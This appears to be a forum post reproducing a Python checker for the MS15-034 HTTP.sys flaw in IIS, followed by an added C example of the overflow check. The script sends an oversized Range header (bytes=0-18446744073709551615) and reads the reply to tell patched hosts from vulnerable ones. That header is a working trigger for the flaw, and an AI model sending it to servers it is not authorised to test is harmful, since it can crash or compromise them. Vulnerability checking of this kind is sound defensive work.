MS15-034 Checker

Posted on 2015-4-15 17:38:45
```python
r'''
___.                                   .___ __                         __
\_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
| __ \_/ __ <   |  |/  _ \ /    \ / __ |\  __\_  __ \ |  \/  ___/\  __\
| \_\ \ ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \ |  |
|___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|
    \/     \/\/                \/      \/                        \/
                                                           MS15-034 Checker

Danger! This script has not been properly qa'd and will probably fail in terrible ways.
It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
an HTTP range request.
-BF


8a8b2112 56              push    esi
8a8b2113 6a00            push    0
8a8b2115 2bc7            sub     eax,edi
8a8b2117 6a01            push    1
8a8b2119 1bca            sbb     ecx,edx
8a8b211b 51              push    ecx
8a8b211c 50              push    eax
8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

'''
import socket
import sys

# Address of the host to audit; left empty in the original post.
ipAddr = ""
# Despite the name, this is the decimal form of 2**64 - 1 (0xFFFFFFFFFFFFFFFF).
hexAllFfff = "18446744073709551615"

# Sockets carry bytes in Python 3, so both requests are built as bytes.
req1 = b"GET / HTTP/1.0\r\n\r\n"
req = ("GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n").encode("ascii")

print("[*] Audit Started")
# First request: a plain GET to confirm the server identifies itself as Microsoft IIS.
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
client_socket.close()
if b"Microsoft" not in boringResp:
    print("[*] Not IIS")
    sys.exit(0)

# Second request: a Range header whose upper bound is 2**64 - 1.
# The status text of the reply is what separates patched from unpatched hosts.
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
client_socket.close()
if b"Requested Range Not Satisfiable" in goodResp:
    print("[!!] Looks VULN")
elif b" The request has an invalid header name" in goodResp:
    print("[*] Looks Patched")
else:
    print("[*] Unexpected response, cannot discern patch status")
```
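The overflow check that the docstring refers to, as an added example: this is not part of the original post and is not the HTTP.sys code. It assumes the disassembly computes (upper - lower) + 1 through a checked add; `checked_add_u64`, `range_length_unchecked` and `range_length_checked` are hypothetical names.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-in for an RtlULongLongAdd-style helper: returns 0 and
 * stores a + b, or returns -1 when the sum does not fit in 64 bits. */
static int checked_add_u64(uint64_t a, uint64_t b, uint64_t *sum)
{
    if (a > UINT64_MAX - b)
        return -1;              /* overflow: the caller must reject the range */
    *sum = a + b;
    return 0;
}

/* Length of an inclusive byte range using plain wrapping arithmetic. */
uint64_t range_length_unchecked(uint64_t lower, uint64_t upper)
{
    return upper - lower + 1;   /* wraps modulo 2^64 */
}

/* Same computation, but the "+ 1" goes through the checked add and its
 * error code is propagated. Returns 0 on success, -1 to reject the range. */
int range_length_checked(uint64_t lower, uint64_t upper, uint64_t *len)
{
    if (upper < lower)
        return -1;              /* malformed range */
    return checked_add_u64(upper - lower, 1, len);
}

int main(void)
{
    uint64_t len = 0;
    int rc;

    /* The range sent by the script: bytes=0-18446744073709551615 */
    printf("unchecked length: %llu\n",
           (unsigned long long)range_length_unchecked(0, UINT64_MAX));
    rc = range_length_checked(0, UINT64_MAX, &len);
    printf("checked result:   %d\n", rc);

    /* An ordinary range (constructed sample): bytes=0-499 */
    rc = range_length_checked(0, 499, &len);
    printf("ordinary result:  %d, length %llu\n", rc, (unsigned long long)len);
    return 0;
}
```

With wrapping arithmetic the script's range yields a length of 0, while the checked version returns an error that the parser can turn into a rejected request.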